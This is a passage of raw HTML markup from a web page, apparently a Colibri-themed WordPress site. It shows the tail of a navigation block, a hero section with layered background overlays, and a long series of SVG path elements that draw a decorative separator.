style-local-22-h9-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-start align-items-md-start align-items-start style-212 style-local-22-h24 position-relative\">\n    <div class=\"background-wrapper\">\n      <div class=\"background-layer background-layer-media-container-lg\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container-md\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n      <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n        <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n        <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n        <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n        <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n        <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n        <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n        <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n        <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n        <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n        <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n        <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n        <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n        <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n        <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n        <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n        <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n        <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n        <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n        <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n        <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n        <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n        <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n        <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n        <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n        <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n        <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n        <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n        <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n        <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n        <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n        <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n        <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n        <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n        <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n        <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n        <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n        <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n        <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n        <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n        <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n        <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n        <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n        <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n        <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n        <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n        <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n        <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n        <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n        <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n        <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n        <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n        <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n        <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n        <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n        <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n        <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n        <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n        <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n        <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n        <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n        <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n        <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n        <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n        <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n        <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n        <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n        <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n        <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n        <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n        <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n        <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n        <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n        <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n        <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n        <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n        <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n        <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n        <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n        <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n        <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n        <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n        <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n        <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n        <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n        <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n        <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n        <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n        <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n        <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n        <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n        <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n        <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n        <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n        <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n        <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n        <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n        <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n        <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n        <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n        <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n        <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n        <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n        <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n        <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n        <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n        <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n        <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n        <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n        <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n        <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n        <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n        <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n        <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n        <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n        <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n        <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n        <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n        <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n        <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n        <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n        <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n        <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n        <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n        <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n        <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n        <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n        <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n        <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n        <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n        <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n        <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n        <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n        <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n        <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n        <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n        <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n        <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n        <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n        <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n        <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n        <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n        <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n        <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n        <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n        <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n        <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n        <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n        <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n        <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n        <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n        <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n        <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n        <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n        <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n        <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n        <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n        <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n        <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n        <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n        <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n        <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n        <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n        <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n        <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n        <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n        <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n        <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n        <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n        <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n        <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n        <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n        <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n        <path 